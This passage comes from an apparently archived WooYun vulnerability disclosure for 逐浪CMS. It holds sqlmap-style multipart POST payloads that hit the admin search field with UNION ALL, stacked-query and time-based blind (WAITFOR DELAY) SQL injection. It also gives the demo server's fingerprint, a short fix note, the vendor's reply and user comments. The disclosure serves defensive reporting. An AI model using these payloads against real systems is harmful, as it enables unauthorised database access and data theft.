 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
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$txtTitle"
 
 123456%' UNION ALL SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+CHAR(100)+CHAR(87)+CHAR(122)+CHAR(70)+CHAR(88)+CHAR(112)+CHAR(69)+CHAR(101)+CHAR(77)+CHAR(72)+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$txtTime"
 
 2014-08
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$btnSeach"
 
 ??��������
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
 
 10
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
 
 1
 ------WebKitFormBoundary5n6dB9dFzpkAYygr--
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries
     Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__EVENTTARGET"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__EVENTARGUMENT"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__LASTFOCUS"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__VIEWSTATE"
 
 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
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$txtTitle"
 
 123456%'; WAITFOR DELAY '0:0:5'--
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$txtTime"
 
 2014-08
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$btnSeach"
 
 ??��������
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
 
 10
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
 
 1
 ------WebKitFormBoundary5n6dB9dFzpkAYygr--
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind
     Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__EVENTTARGET"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__EVENTARGUMENT"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__LASTFOCUS"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__VIEWSTATE"
 
 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
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$txtTitle"
 
 123456%' WAITFOR DELAY '0:0:5'--
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$txtTime"
 
 2014-08
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$btnSeach"
 
 ??��������
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
 
 10
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
 
 1
 ------WebKitFormBoundary5n6dB9dFzpkAYygr--
 ---
 web server operating system: Windows 8.1 or 2012 R2
 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
 back-end DBMS: Microsoft SQL Server 2008
 current user:    'demozoomla_f'

c.商城管理的明细记录处:

逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

d.企业黄页的黄页内容管理的搜索处

逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

e.企业黄页的黄页标签管理的搜索处

逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

修复方案:

验证码设计错误

修复搜索型注入点

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-08-06 13:19

厂商回复:

我们的后台安全机制通过以下几个方式来保障:
1、三次登陆出现验证码,即贵文所呈问题。
2、安全码,默认不启用,可以启用之加强安全,预置的安全码。
3、可变更的后台路径,对于demo我们是开放后台路径,而后台事实是一个变更的值。

感谢贵文反馈的安全问题,我们将加强并尽快改进。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-08-05 21:11 | loli 逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当) ( 普通白帽子 | Rank:649 漏洞数:59 | 每个男人心中都住着一个叫小红的88号技师。)

    0

    放过它把

  2. 2014-08-07 06:38 | HackBraid 逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当) ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗,任何自称HackBrai...)

    0

    @逐浪CMS 可能你没看懂,我的爆破是带上验证码的。也就是说有没有验证码都一样。

  3. 2014-08-26 16:38 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

    1

    后台的就多了去了。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin